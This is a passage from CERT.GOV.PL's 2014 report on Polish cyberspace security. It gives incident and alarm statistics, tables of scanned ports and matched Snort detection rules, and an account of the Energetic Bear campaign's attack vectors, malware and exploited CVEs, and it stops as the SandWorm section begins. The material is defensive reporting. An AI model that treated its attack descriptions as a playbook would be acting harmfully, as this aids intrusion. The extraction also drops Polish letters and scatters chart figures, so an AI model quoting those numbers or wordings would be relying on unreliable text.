Raport o Stanie Bezpieczenstwa Cyberprzestrzeni RP W 2014 Roku

CERT.GOV.
PL
Raport o stanie bezpieczestwa
cyberprzestrzeni RP w roku 2014
Warszawa / marzec 2015
Raport o stanie bezpieczestwa cyberprzestrzeni RP w roku 2014

ZESP CERT.GOV.PL
Rzdowy Zesp Reagowania na Incydenty Komputerowe CERT.GOV.PL peni rol gwnego
zespou CERT odpowiadajcego za koordynacj procesu reagowania na incydenty
komputerowe w obszarze administracji rzdowej. Zesp funkcjonuje od 1 lutego 2008 roku
w Agencji Bezpieczestwa Wewntrznego. Zgodnie z przyjt w drodze uchway Rady
Ministrw w dniu 25 czerwca 2013 roku Polityk Ochrony Cyberprzestrzeni Rzeczypospolitej
Polskiej w ramach ustanowionego Krajowego Systemu Reagowania na Incydenty
Komputerowe CERT.GOV.PL zosta wskazany w ramach drugiego poziomu tj. reagowania na
incydenty komputerowe. Jednym z podstawowych zada Zespou jest wspieranie
i rozwijanie zdolnoci jednostek administracji rzdowej do obrony przed zagroeniami
pyncymi z cyberprzestrzeni.
CERT.GOV.PL - dane kontaktowe

www.cert.gov.pl
cert@cert.gov.pl
Tel:
+48 22 58 59 373
Faks:
+48 22 58 58 833
Agencja Bezpieczestwa Wewntrznego

Ul. Rakowiecka 2a
00-993 Warszawa
Polska
Spis treci
Wstp .................................................................................................................................................... 4
1. STATYSTYKA ........................................................................................................................................ 6
1.1. Statystyki incydentw koordynowanych przez Zesp CERT.GOV.PL ........................................ 6
1.2. Analiza alarmw na podstawie systemu ARAKIS-GOV ............................................................... 9
System ARAKIS 2.0 GOV ........................................................................................................... 14
1.3. Publikacje na stronie www.cert.gov.pl ..................................................................................... 14
2. OMWIENIE PRZYKADOWYCH ZAGROE ..................................................................................... 16
2.1. Energetic Bear/Dragon Fly ....................................................................................................... 16
2.2. SandWorm ................................................................................................................................ 19
2.3. Heartbleed................................................................................................................................ 20
Heartbleed a ARAKIS-GOV........................................................................................................ 20
2.4. Kampanie phishingowe ............................................................................................................ 23
Wiadomoci e-mail zawierajce faszyw aktualizacj BeSTi@ ............................................... 25
Faszywe wiadomoci podszywanie si pod Zakad Ubezpiecze Spoecznych .................... 26
Faszywe wiadomoci podszywanie si pod Poczt Polsk ................................................... 27
2.5. Podatnoci ................................................................................................................................ 29
Open DNS Resolver (Domain Name System) ........................................................................... 29
Open NTP (Network Time Protocol) ......................................................................................... 31
SSDP (Simple Service Discovery Protocol) ................................................................................ 33
SNMP (Simple Network Management Protocol) ..................................................................... 36
2.6. DDoS (Distributed Denial of Service)........................................................................................ 38
2.7. Krajowe Biuro Wyborcze .......................................................................................................... 39
2.8. Gieda Papierw Wartociowych w Warszawie ....................................................................... 40
3. TESTY BEZPIECZESTWA WITRYN INTERNETOWYCH ADMINISTRACJI PUBLICZNEJ......................... 41
4. WSPPRACA KRAJOWA I MIDZYNARODOWA............................................................................... 45
4.1. Udzia w pracach nad dokumentami strategicznymi ............................................................... 45
4.2. wiczenia Locked Shields ......................................................................................................... 45
4.3. wiczenia Cyber Coalition 2014 ............................................................................................... 46
4.4. Szkolenia krajowe ..................................................................................................................... 46
5. NOWE TRENDY WOJNA INFORMACYJNA ....................................................................................... 48
6. PODSUMOWANIE ORAZ ZALECENIA I REKOMENDACJE ................................................................... 50
6.1. Zalecenia i rekomendacje dla instytucji ................................................................................... 51
Dziaania dorane: .................................................................................................................... 51
Dziaania docelowe................................................................................................................... 53
Zalecenie dotyczce podnoszenia zdolnoci odpierania atakw DDoS ................................... 54
Katalog zagroe ...................................................................................................................... 55
6.2. Informacje dla pozostaych uytkownikw .............................................................................. 56
7. Spis tabel, wykresw i rysunkw ...................................................................................................... 57
CERT.GOV.PL
3 / 58

Wstp
Raport o stanie bezpieczestwa cyberprzestrzeni RP w roku 2014 publikowany jest w celu
podnoszenia wiadomoci uytkownikw o aktualnych zagroeniach i podatnociach, a take
skutkach ich ewentualnego wystpienia dla systemw teleinformatycznych. Ujte
w Raporcie informacje, w tym dane statystyczne, maj dostarczy wiedzy niezbdnej dla
procesw planowania i wdraania w instytucjach rozwiza przyczyniajcych si
do podwyszenia odpornoci jawnych systemw teleinformatycznych.
Dostrzegalny jest w ostatnich latach wyrany wzrost dynamiki atakw, ktre cz moliwe
metody i narzdzia, zwikszajc tym samym ewentualn skuteczno prowadzonych
dugofalowych dziaa, nastawionych na osignicie zamierzonego celu. Atakujcymi s ju
nie tylko pojedyncze osoby, ale te wysoko wyspecjalizowane grupy wykorzystujce coraz
bardziej zaawansowane technologie oraz wektory ataku. Naley przy tym doda, e
do przeprowadzania atakw powszechnie wykorzystywane s sieci anonimizujce m.in. TOR,
ktre istotnie ograniczaj moliwo zidentyfikowania sprawcw. Informacje dotyczce
prowadzonych cyberkampanii pokazuj, e w gwnym obszarze zainteresowania ze strony
najgroniejszych atakujcych znajduj si instytucje z sektora energetycznego oraz systemy
rzdowe, co odzwierciedla wiatowy trend w tej kwestii.
Zespoy powoane do reagowania na incydenty komputerowe i instytucje musz zwiksza
moliwoci odparcia najbardziej dotkliwych form atakw jak m.in. ataki typu APT (ang.
Advanced Persistent Threat) czy spear phishing. Wydarzenia roku ubiegego pokazuj,
i niestety nadal, czynnikami przyczyniajcymi si do skali skutecznoci przeprowadzanych
atakw, pozostaj: nieodpowiednie podejcie do kwestii bezpieczestwa systemw, brak
wdroenia odpowiednich procedur w instytucjach oraz tendencja do redukcji wysokoci
finansw przeznaczonych na funkcjonowanie instytucji kosztem bezpieczestwa. Ogromne
znaczenie ma take niski poziom wiadomoci wrd kadry zarzdzajcej i pracownikw oraz
brak okresowych szkole z danego zakresu.
Poza tradycyjnymi czynnikami wpywajcymi na bezpieczestwo cyberprzestrzeni RP, takimi
jak: upowszechnienie technologii teleinformatycznych, uproszczenie i dostpno narzdzi
pomocnych w przeprowadzeniu atakw oraz niedofinansowanie systemw ochrony zasobw
administracji pastwowej jednym z najistotniejszych elementw w ostatnim roku
pozostawa wpyw aktualnej sytuacji geopolitycznej zwizanej z kryzysem na Ukrainie.
W zwizku z powyszym, niezwykle istotna jest wsppraca instytucji z powoanymi
Zespoami Reagowania na Incydenty Komputerowe, oraz wdraanie wydawanych
rekomendacji. Wsplnie podejmowane dziaania z instytucjami umoliwiaj prowadzenie
przez Zesp CERT.GOV.PL dziaa wyprzedzajcych m.in. poprzez cyrkulacj ostrzee
i alertw skierowanych do instytucji, ktre pozwalaj w wielu sytuacjach unikn zagroenia
lub ewentualnie pomagaj wykry, zneutralizowa czy zminimalizowa negatywny skutek
4 / 58
CERT.GOV.PL

jego wystpienia. Powysze dziaania przynosz rwnie pozytywne efekty dla instytucji
i firm wanych dla bezpieczestwa RP, poniewa czsto podnosz one zdolnoci
zapobiegania lub neutralizacji dziaa, ktre skutkowa mog m.in. znacznymi stratami
finansowymi lub utrat zaufania.
Na koniec, w kontekcie pyta zadawanych czsto przez przedstawicieli mediw,
chcielibymy przypomnie, e niniejsze opracowanie ma charakter jawny. Z oczywistych
wzgldw ABW nie informuje publicznie o stanie aktualnego rozpoznania obcej dziaalnoci
wywiadowczej, take prowadzonej w cyberprzestrzeni RP. Ze wzgldw prawnych raport nie
zawiera te szczegowych informacji o incydentach bdcych elementem prowadzonych
postpowa karnych i kontrolnych.
CERT.GOV.PL
5 / 58

1. STATYSTYKA
1.1. Statystyki incydentw koordynowanych przez Zesp CERT.GOV.PL
Rok 2014 pod wzgldem liczby otrzymanych zgosze oraz obsuonych incydentw kolejny
raz okaza si dla Zespou CERT.GOV.PL rekordowy w stosunku do lat poprzednich. Wzrost
liczby zgosze nastpi w drugim kwartale 2014 roku i spowodowany by gwnie m.in.
upublicznieniem informacji o powanym zagroeniu w zabezpieczeniach bibliotek OpenSSL,
tzw. Heartbleed.
W sumie, zarejestrowanych zostao a 12017 zgosze, z ktrych 7498 zakwalifikowano, jako
incydenty. Poniszy wykres obrazuje ilo zarejestrowanych zgosze oraz obsuonych przez
Zesp CERT.GOV.PL incydentw teleinformatycznych w poszczeglnych kwartaach
2014 roku.
4500
3912
4000
3373
3500
2862
3000
2500
2000
1500
2346
1870
2109
1630
1413
1000
500
0
I kwarta
II kwarta
Zgoszenia incydentw
III kwarta
IV kwarta
Faktyczne incydenty
Wykres 1. Liczba zarejestrowanych zgosze oraz incydentw w poszczeglnych kwartaach 2014 roku
Rnica w liczbie zarejestrowanych zgosze oraz liczbie incydentw wynika z faktu, e cz

z nich stanowi tzw. false-positives. S to przypadki bdnej interpretacji przez zgaszajcego
legalnego ruchu sieciowego. Drug z przyczyn, szczeglnie widoczn w przypadku zgosze
z systemw automatycznych, s wielokrotne zgoszenia dotyczce tych samych incydentw.
Ponadto, naley tu rwnie zwrci uwag na fakt, i zgoszenia pochodzce z systemw
autonomicznie raportujcych m.in. za porednictwem platformy N6 1, zostaj poddane
pniejszej weryfikacji przez Zesp CERT.GOV.PL, ktry wskazuje, czy zgoszeniom mona
nada atrybut incydentu.
1
Platforma N6 zostaa zbudowana przez Zesp CERT Polska i suy gromadzeniu, przetwarzaniu oraz
przekazywaniu informacji o zdarzeniach naruszajcych bezpieczestwo teleinformatyczne.
6 / 58
CERT.GOV.PL

Ponisze wykresy przedstawiaj szczegowe statystyki uwzgldniajce rda zgosze
incydentw trafiajcych do Zespou CERT.GOV.PL.
95,00%
89,59%
90,00%
85,00%
80,00%
83,81%
78,66%
75,89%
75,00%
70,00%
65,00%
I kw arta
II kw arta
III kw arta
IV kw arta
Wykres 2. rda incydentw zgoszenia z wykorzystywanych przez Zesp CERT.GOV.PL systemw

wspomagajcych
14,00%
12,00%
12,46%
10,00%
8,00%
5,45%
6,00%
4,00%
5,84%
3,83%
2,00%
0,00%
I kwarta
II kwarta
III kwarta
IV kwarta
Wykres 3. rda incydentw ustalenia wasne
20,00%
18,27%
15,00%
10,00%
12,36%
8,88%
4,96%
5,00%
0,00%
I kwarta
II kwarta
III kwarta
IV kwarta
Wykres 4. rda incydentw zgoszenia podmiotw zewntrznych
CERT.GOV.PL
7 / 58

Podzia zarejestrowanych incydentw w 2014 roku na poszczeglne kategorie przedstawiony

zosta na wykresie nr 5, ktry zawiera zarwno dotychczas stosowan terminologi katalogu
zagroe oraz nowy podzia, ktry zosta wprowadzony w trzecim kwartale 2014 roku.
Botnet
Bdna konfiguracja urzdzenia
Skanowanie
Inynieria spoeczna
Bedy aplikacji WEB
Wirus
Nieuprawniona zmiana informacji
Atak odmowy dostpu (np. DDoS, DoS)
Ko Trojaski
Nieuprawniony dostp do informacji
Treci obraliwe
Przestpstwo o charakterze terrorystycznym popenione w cyberprzestrzeni
Wykorzystanie podatnoci aplikacji
Dezinformacja
Wamanie do aplikacji
Kradzie tosamoci, podszycie si
Wamanie na konto/ataki siowe
Naruszenie procedur bezpieczestwa
Pomawianie (zniesawianie)
Podsuch
Robak sieciowy
Nieuprawnione logowanie
Nieuprawnione wykorzystanie zasobw
Prby nieuprawnionego logowania
Wamanie na konto uprzywilejowane
Wykorzystanie podatnoci w urzdzeniach
4 681
2 213
132
119
101
35
29
20
18
15
14
12
9
7
6
5
4
3
3
2
2
1
1
1
1
1
Wykres 5. Statystyka wybranych incydentw w roku 2014 z podziaem na kategorie
Dezinformacja publikowanie nieprawdziwych informacji, ktre wiadomie wprowadzaj w bd

potencjalnych odbiorcw tej wiadomoci, starajc si tym samym odwrci uwag od faktycznie zaistniaych
zdarze.
Inynieria spoeczna (socjotechnika) wykorzystanie niewiedzy oraz ludzkiej natury przez cyberprzestpcw
w celu przeamania zabezpiecze oraz uzyskania nieautoryzowanego dostpu do komputera. Celem inynierii
spoecznej jest potajemne instalowanie oprogramowania szpiegujcego lub innego zoliwego
oprogramowania, a take prba uzyskania poufnych informacji uytkownika np. hase dostpowych do konta
bankowego.
8 / 58
CERT.GOV.PL

W 2014 roku najwiksz grup, jak co roku, stanowiy incydenty w kategorii botnet. Zesp
CERT.GOV.PL zarejestrowa a 4681 incydentw dotyczcych oprogramowania zoliwego
dziaajcego na stacjach roboczych, podczonych do sieci teleinformatycznej jednostek
administracji publicznej. Najczciej wystpujcymi typami botnetw w 2014 roku
wykrytymi w infrastrukturze administracji pastwowej, byy botnety Downadup oraz
Conficker.
20,00%
15,00%
16,83%
12,98%
18,56%
14,09%
10,00%
5,00%
0,00%
zeus
B68_DNS
conficker
downadup
Wykres 6. Cztery gwne typy botnetw w 2014 roku

(w odniesieniu do wszystkich zarejestrowanych incydentw w kategorii botnet)
W kategorii bdna konfiguracja urzdzenia uwzgldniono informacje o podatnociach oraz

bdach konfiguracji aplikacji, bd urzdze sieciowych. Znaczcy wpyw na statystyk miay
w tej kategorii pozyskane przez Zesp CERT.GOV.PL informacje o podatnoci serwerw DNS
(DNSOpenResolver), podatno serwerw NTP, a take podatnoci SNMP w sumie 2213
incydenty. Ponadto, Zesp CERT.GOV.PL otrzymywa znaczn ilo zgosze zwizanych
ze skanowaniem sieci w poszukiwaniu bdw i podatnoci 132 incydenty oraz okrelonych
jako inynieria spoeczna 119 incydentw. Dwukrotny wzrost w stosunku do roku 2013
zosta odnotowany w przypadku atakw odmowy dostpu (DDoS i DoS) z 10 w 2013 roku do
20 w 2014 roku.
1.2. Analiza alarmw na podstawie systemu ARAKIS-GOV

System ARAKIS-GOV w 2014 roku zarejestrowa 28322 alarmy. Ze wzgldu na poziom
istotnoci i zagroenia, alarmy podzielono na trzy gwne kategorie. Najmniej odnotowano
alarmw najgroniejszych o priorytecie wysokim 1140, co stanowio 4% wszystkich
zarejestrowanych. Najwicej natomiast odnotowano alarmw o priorytecie rednim
13896, ktre stanowiy 49% ogu. Pozostae alarmy posiaday priorytet niski, ktrych
odnotowano 13286.
CERT.GOV.PL
9 / 58

4%
13896
13286
47%
49%
1140
Wysoki
redni
Wysoki
Niski
Wykres 7. Rozkad procentowy alarmw

ze wzgldu na priorytet
redni
Niski
Wykres 8. Rozkad ilociowy alarmw

ze wzgldu na priorytet
Porwnujc powysze statystyki z rokiem 2013, mona zaobserwowa znaczny wzrost

ilociowy odnotowanych alarmw, zarwno tych o priorytecie wysokim i rednim.
13896
13286
12900
4773
1140
644
Wysoki
redni
2014
2013
Niski
Wykres 9. Porwnanie rozkadu alarmw w latach 2014 i 2013
W kontekcie alarmw o priorytecie wysokim i rednim wikszo alarmw

wynika z obserwowanego wzrostu zainteresowania przestrzeniami publicznych adresw IP
instytucji w ramach systemu ARAKIS-GOV. Powysze przejawia si odnotowaniem wikszej
iloci alarmw zwizanych z procesem rozpoznania zasobw sieci (skanowanie sieci) przy
zastosowaniu mechanizmu spoofowania (faszowania) rdowego adresu IP.
10 / 58
CERT.GOV.PL

Informacje gromadzone i analizowane przez system ARAKIS-GOV pozwalaj na okrelenie
lokalizacji geograficznej rde, z ktrych wykonywano ataki na polskie sieci administracji
publicznej. Naley jednak pamita, e specyfika protokou TCP/IP sprawia, i nie mona
bezporednio czy rda pochodzenia pakietw z rzeczywist lokalizacj zleceniodawcy
ataku. Wynika to z faktu, i w celu ukrycia swej tosamoci i fizycznej lokalizacji atakujcy
mog wykorzystywa serwery poredniczce (proxy), sabo zabezpieczone, bd
nieaktualizowane komputery, nad ktrymi wczeniej przejmuj kontrol. W przypadku
protokou UDP/IP natomiast, ze wzgldu na fakt, i jest protokoem bezpoczeniowym
podszycie nie stanowi adnego problemu a weryfikacja autentycznoci nadawcy jest
niezwykle trudna.
Do najbardziej aktywnych pod ktem iloci generowanych pocze nale adresy IP
przypisane do Chin okoo 28% i Holandii przeszo 14%.
28,87%
Chiny
14,75%
Holandia
13,69%
Stany Zjednoczone
9,59%
Nieznany
6,63%
Portugalia
Japonia
Korea Poudniowa
Francja
Federacja Rosyjska
Dania
4,05%
3,63%
3,02%
2,68%
1,52%
Wykres 10. Rozkad procentowy rde atakw na sieci monitorowane przez system ARAKIS-GOV pod ktem
iloci generowanych pocze
Nieznacznie rni si statystki lokalizacji geograficznej rdowych adresw IP pod ktem

ich unikalnego wystpowania.
CERT.GOV.PL
11 / 58

36,04%
Chiny
9,26%
Stany Zjednoczone
Indie
4,58%
Turcja
4,02%
Taiwan
3,91%
Brazylia
3,00%
Federacja Rosyjska
2,51%
Meksyk
2,45%
Korea Poudniowa
2,41%
Niemcy
2,01%
Wykres 11. Rozkad procentowy rde atakw na sieci monitorowane przez system ARAKIS-GOV pod ktem
unikalnych adresw IP
W powyszych wykresach dotyczcych statystyk rde atakw, wystpuje element

nieznane, dotyczcy adresw IP, ktre w chwili obecnej nie s przypisane do adnego
podmiotu oznacza to, i dokonano podszycia si (podmiany prawdziwego rdowego
adresu IP).
Zastosowanie w systemie ARAKIS-GOV systemw honeypot-owych do wykrywania atakw
z sieci Internet, dostarcza istotnych informacji na temat procesu rozpoznawania zasobw
(skanowania). Na podstawie powyszych danych przedstawiono tabel, zawierajc ranking
skanowanych portw popularnych usug sieciowych pod wzgldem liczby unikalnych
adresw IP w skali caego roku.
L.p.
Docelowy
port/protok
Procent unikalnych IP
Opis
23/TCP
31,50%
Ataki na usug telent
5000/TCP
11,28%
445/TCP
9,87%
80/TCP
7,46%
Ataki na aplikacje webowe
22/TCP
4,18%
Ataki na usug SSH
3389/TCP
4,10%
Ataki na usug RDP (zdalny pulpit)
8080/TCP
3,41%
Skanowanie w poszukiwaniu serwerw

open web proxy
1433/TCP
2,80%
Ataki na usug bazy danych MSSQL
12 / 58
Atak na usug zarzdzania rozwizania typu

NAS firmy Synology
Ataki typu bufferoverflow na usugi
Windows RPC
CERT.GOV.PL
139/TCP
1,62%
Ataki na usug NetBIOS
10
5900/TCP
1,58%
Ataki na usug VNC (zdalny pulpit)
Tabela 1. Tabela atakowanych portw w roku 2014 na podstawie danych z systemu ARAKIS-GOV
Powysza tabela obrazuje skal zainteresowania konkretnymi usugami przez zoliwe

oprogramowanie, bd samych atakujcych. Pierwsze miejsce zajmuje port 23/TCP (ataki
na usug telnet), na drugim miejscu (zmiana w stosunku do statystyk za rok 2013) znajduje
si port 5000/TCP, ktry zwizany jest z usug panelu zarzdzajcego rozwiza typu NAS
(Network Attached Storage) firmy Synology.
System ARAKIS-GOV, na podstawie analizy zebranego ruchu, prbuje rwnie dokona
identyfikacji zagroenia na podstawie bazy znanych zagroe w postaci regu systemu Snort3.
Na tej podstawie stworzono zestawienie najczciej odnotowanych regu systemu Snort
w systemie ARAKIS-GOV.
L.p.
Procent wszystkich
unikalnych IP
Regua SNORT
19,70%
MISC MS Terminal server request
19,69%
ET POLICY RDP connection request
16,55%
ET POLICY Radmin Remote Control Session Setup Initiate
10,52%
WEB-IIS view source via translate header
5,46%
BLEEDING-EDGE RDP connection request
3,45%
ET POLICY Suspicious inbound to MSSQL port 1433
3,42%
ET SCAN Potential SSH Scan
2,40%
ET POLICY RDP disconnect request
2,29%
ET SCAN LibSSH Based SSH Connection - Often used as a BruteForce Tool
10
1,55%
ET SCAN Behavioral Unusually fast Terminal Server Traffic
Tabela 2. Najczciej dopasowane reguy do ruchu sieciowego widzianego przez system ARAKIS-GOV
Snort sieciowy system wykrywania wama, dostpny na wolnej licencji, posiadajcy szeroki zakres
mechanizmw detekcji atakw oraz umoliwiajcy, w czasie rzeczywistym, dokonywanie analizy ruchu
i rejestrowanie pakietw przechodzcych przez sieci oparte na protokoach IP/TCP/UDP/ICMP
CERT.GOV.PL
13 / 58

Pierwsze dwie pozycje w statystykach zajmuj reguy dotyczce atakw na usugi pulpitu
zdalnego RDP, w ktrych czciowo poczenia mog by zwizane z nadal widoczn
(podobnie jak w roku ubiegym) aktywnoci robaka Morto 4.
System ARAKIS 2.0 GOV
System ARAKIS-GOV dziaa od roku 2007, w ktrym rozpocz si proces jego wdroenia
produkcyjnego, obecnie rozlokowany jest w ponad kilkudziesiciu instytucjach administracji
publicznej. Gwnym celem systemu jest wczesne ostrzeganie o zagroeniach pyncych
z sieci Internet i opisywanie zidentyfikowanych zagroe w postaci sygnatury. Majc
na uwadze fakt szybkiej i cigej ewolucji zagroe, podjto dziaania w celu utworzenia
nowej wersji systemu tj. ARAKIS 2.0 GOV, ktra bdzie wykorzystywaa dowiadczenia
zdobyte podczas dziaania systemu w wersji pierwszej oraz bdzie dostosowana do
aktualnych trendw i rodzajw zagroe obserwowanych w sieci Internet. W stosunku do
obecnej wersji systemu, ARAKIS 2.0 GOV bdzie charakteryzowa si ulepszonymi
funkcjonalnociami zapoyczonymi z systemu ARAKIS-GOV oraz zupenie nowymi moduami
pozwalajcymi na szybsze i lepsze wykrywanie atakw, oraz innego rodzaju zagroe. Nadal
nie zmieni si architektura systemu i podobnie jak w systemie ARAKIS-GOV bdzie skada
si z sensorw rozlokowanych w segmentach sieci instytucji, ktre bd komunikowa si
z Centrum Systemu. Autorzy systemu zdecydowali si na budow moduow, ktra pozwoli
na atwiejsze rozwijanie w przyszoci rozwizania jak i umoliwi spersonalizowanie
wdroenia zgodnie z oczekiwaniami instytucji biorcych udzia w projekcie. Naley pamita,
i wybr funkcjonalnoci sensora wdraanego w sieci danego podmiotu w dalszym cigu
pozostaje w gestii instytucji przystpujcej do systemu ARAKIS 2.0 GOV.
1.3. Publikacje na stronie www.cert.gov.pl

Jak co roku na witrynie internetowej Zespou CERT.GOV.PL www.cert.gov.pl opublikowano
specjalistyczne informacje o istotnych zagroeniach, podatnociach oraz aktualizacjach
w popularnych i najczciej wykorzystywanych w administracji publicznej systemach
i aplikacjach. Ponadto na stronie zawarto informacje o najpopularniejszych formach atakw
sieciowych oraz sposobach przeciwdziaania i neutralizowania ich skutkw w formie
zrozumiaej zarwno przez administratorw jak i uytkownikw. Dodatkowo na witrynie
Zespou CERT.GOV.PL umieszczane byy na bieco biuletyny bezpieczestwa udostpnione
przez producentw sprztu i oprogramowania. Zawieraj one w szczeglnoci omwienie
ostatnio wykrytych luk bezpieczestwa ich produktw oraz metody neutralizacji
potencjalnych zagroe.
4
Morto robak sieciowy atakujcy le zabezpieczone systemy Microsoft Windows, wykorzystujc do tego celu
protok RDP (Remote Desktop Protocol) wykorzystywany przez tzw. zdalny pulpit. Morto nie eksploituje
adnej luki w oprogramowaniu, a atak polega na prbie odgadnicia nazwy uytkownika i hasa (brute-force).
14 / 58
CERT.GOV.PL
60
53
9%
50
Poprawki i
aktualizacje
11%
40
30
Zagroenia i
podatnoci
20
7
10
6
80%
0
Poprawki i
aktualizacje
Zagroenia i
podatnoci
Wiadomoci
oglne
Wiadomoci
oglne
Wykres 12. Statystyka publikacji na stronie cert.gov.pl w 2014 roku
CERT.GOV.PL
15 / 58

2. OMWIENIE PRZYKADOWYCH ZAGROE

Wskaza naley, e zakres udzielanego przez Zesp CERT.GOV.PL wsparcia przy eliminacji
zagroenia lub podatnoci, a zwaszcza przy minimalizacji negatywnych skutkw ataku
i przywrcenia funkcjonalnoci systemw zaley od decyzji samej instytucji, ktra staa si
celem. Podejmowane, przez Zesp CERT.GOV.PL dziaania prewencyjno-informacyjne
(w formie przekazywanych ostrzee oraz rekomendacji majcych na celu zwikszenie
poziomu bezpieczestwa systemw teleinformatycznych) bd skuteczne przy ich wdroeniu
przez samych zainteresowanych. Na podstawie zaprezentowanych przykadw chcemy
wskaza, e warto stosowa si do rekomendacji przesyanych przez Zesp CERT.GOV.PL.
2.1. Energetic Bear/Dragon Fly

W 2014 roku Zesp CERT.GOV.PL odnotowa incydenty zwizane z kampani cyber-szpiegowsk okrelan mianem Energetic Bear. Przedmiotowa nazwa zostaa nadana przez
firm CrowdStrike 5, ktra jako pierwsza opublikowaa raport w tej sprawie. Naley jednak
zaznaczy, e kampani rwnolegle baday rwnie inne organizacje i firmy z zakresu
bezpieczestwa w cyberprzestrzeni, co skutkowao powstaniem alternatywnych nazw
dla operacji: Dragon Fly (nazwa nadana przez firm Symantec) oraz Crouching Yeti (nazwa
nadana przez firm Kaspersky Lab). Kampania cyber-szpiegowska Energetic Bear zostaa
sklasyfikowana przez Red Sky Alliance 6, jako rodzaj atakw typu APT 7 TTPs (ang. tactics
techniques and procedures).
Logo kampanii
Firma Crowd Strike jest globalnym dostawc technologii i usug kierowanych na identyfikacj
zawansowanych zagroe oraz atakw ukierunkowanych.
6
Red Sky Alliance - henrybasset.blogspot.com
7
APT (ang. Advanced Persistent Threat) - ataki ukierunkowane prowadzone przez wysoko wyspecjalizowane
osoby lub grupy osb, wykorzystujce zaawansowane technologie oraz wektory ataku w celu realizacji
okrelonych zada i pozyskania wraliwych lub niejawnych informacji. Cech charakterystyczn atakw jest ich
rozlego w czasie oraz widoczna faza rozpoznania.
16 / 58
CERT.GOV.PL

Podczas ww. kampanii, celem uzyskania dostpu do stacji roboczej, wykorzystano gwnie
trzy wektory ataku:
wiadomoci typu spear phishing 8, zawierajce oprogramowanie zoliwe w postaci

zacznika;
technik watering hole 9 stosowan w celu infekcji potencjalnej ofiary
oprogramowaniem
zoliwym.
Wykorzystano
m.in.
oprogramowanie
zidentyfikowane, jako Lightsout exploit kit;
umieszczenie zoliwego oprogramowania w postaci aktualizacji do oprogramowania
stosowanego
w
sterownikach
przemysowych,
za
porednictwem
skompromitowanych stron producentw tych sterownikw.
W kampanii wykorzystano oprogramowanie zoliwe Remote Access Tool/Trojan(RAT)

zidentyfikowane m.in. jako Backdoor.Oldrea lub Trojan.Karagany, wykorzystujce m.in.
podatnoci w systemie operacyjnym Windows XP lub oprogramowaniu sucym do odczytu
dokumentw np. Adobe Reader: CVE-2013-1347, CVE-2013-1690, CVE-2012-1723, CVE-20122034, CVE-2012-4792, CVE-2013-2465, CVE-2009-3953;
Cyberprzestpcy, na swoje ofiary, obierali najczciej amerykaskie i europejskie firmy
energetyczne, firmy z sektora zbrojeniowego, firmy z sektora IT oraz agencje rzdowe
z co najmniej 23 krajw (w tym Polski) oraz z Chin i Japonii. Skala prowadzonej operacji
obejmowaa co najmniej kilka tysicy potwierdzonych infekcji na caym wiecie,
w tym rwnie komputerw nalecych do polskiej cyberprzestrzeni.
Celem minimalizacji wystpienia ewentualnych negatywnych skutkw kampanii nawizana
zostaa bliska wsppraca z zagroonymi instytucjami i firmami. Jako dobrze rokujce
narzdzie wsppracy z instytucjami mona przytoczy mechanizm wykorzystany
w reakcji na doniesienia o Energetic Bear, majcy na celu ograniczenie moliwoci eskalacji
zagroenia w sieciach i systemach, ktre mogyby zosta dotknite cyberkampani.
Przekazano szczegowe informacje, mogce mie wpyw na bezpieczestwo kluczowych
systemw komputerowych, zawierajce zarwno dane techniczne oraz opis
wykorzystywanej metody dziaania, co wraz z rekomendacjami co do dalszych dziaa
umoliwio dokonanie sprawdzenia czy nie doszo do ewentualnej infekcji. Zwrotna
informacja z instytucji pozwolia zarwno na weryfikacj uzyskanych informacji
w odniesieniu do skutecznoci cyberkampanii w Polsce oraz poszerzenie zebranej wiedzy
na temat skali i mechanizmw cyberkampanii, co w nastpstwie umoliwiao dalsz
8
spear phishing ukierunkowany atak typu "phishing". Atak polega na wysaniu wiadomoci e-mail,
wykorzystujcej wizerunek osoby lub firmy, w celu nakonienia uytkownika do skorzystania z odnonika lub
zacznika o charakterze zoliwym.
9
watering hole technika ataku polegajca na skompromitowaniu konkretnej witryny internetowej, w celu
umieszczenia na niej oprogramowania zoliwego, co w konsekwencji ma doprowadzi do infekcji uytkownika
korzystajcego z przedmiotowej witryny.
CERT.GOV.PL
17 / 58

wspprac, take z innymi podmiotami w celu zneutralizowania zagroenia, bd
minimalizacji jego skutkw dla caego kraju lub sektora.
Zesp CERT.GOV.PL w ramach prowadzonych dziaa informacyjno-prewencyjnych
przekaza ostrzeenia o zagroeniu wraz ze szczegami mogcymi wskaza
na kompromitacj systemw tzn.: dane serwerw zarzdzajcych, adresy e-mail, z ktrych
rozsyano wiadomoci phishingowe, wskazania reklam stanowicych element zoliwy stron
WWW, etc.
Dodatkowo, na witrynie www.cert.gov.pl opublikowane zostao, take skierowane do ogu
uytkownikw cyberprzestrzeni, ostrzeenie o kampanii Energetic Bear oraz wynikajcych
z niej zagroe, wraz z zaleceniami postpowania w przypadku wykrycia infekcji stacji
roboczej.
W wyniku prowadzonych dziaa Zesp CERT.GOV.PL uzyska dane dotyczce kilkuset
adresw IP zainfekowanych urzdze, przynalenych do rnych operatorw
telekomunikacyjnych. Analiza zgromadzonych danych nie wykazaa infekcji istotnych
systemw teleinformatycznych gwnych firm energetycznych RP, oraz instytucji
pastwowych. Odnotowano natomiast wiele infekcji prywatnych stacji roboczych. Do czci
infekcji na terenie RP mogo doj jeszcze w 2013 roku i pozostaway one niewykryte
do czasu zidentyfikowania ich przez Zesp. Powysze byo spowodowane czsto brakiem
oprogramowania antywirusowego lub brakiem aktualizacji bazy sygnatur tego
oprogramowania.
Zainfekowane urzdzenia zostay przyporzdkowane do instytucji i osb, ktre mona
podzieli na grupy ze wzgldu na rodzaj prowadzonej dziaalnoci. Poniej zostaa
przedstawiona charakterystyka:
84,8%
11,5%
0,4%
1,6%
1,6%
Banki
Instytucje
pastwowe
Uczelnie, orodki
badawcze i
naukowe, szkoy
Firmy
Osoby prywatne
Wykres 13. Rozkad zainfekowanych uytkownikw
18 / 58
CERT.GOV.PL

W kontekcie prowadzonych dziaa stwierdzono stosunkowo nisk skuteczno kampanii
Energetic Bear w stosunku do gwnych instytucji i firm zwizanych ze sfer energetyki RP.
Odnotowano natomiast do du liczb infekcji komputerw osb prywatnych, ktre
w rozpoznanym jak dotd zakresie wydaj si by przypadkowymi lub drugorzdnymi
ofiarami przedmiotowej kampanii.
Biece monitorowanie zagroenia oraz prowadzona wsppraca krajowa i midzynarodowa
pozwoliy na skuteczne ograniczenie szkd zwizanych z omawian dziaalnoci.
2.2. SandWorm
Informacja o wykryciu przez firm iSight we wsppracy z firm Microsoft podatnoci typu
0-day dotyczcej wszystkich aktualnie wspieranych przez Microsoft systemw operacyjnych
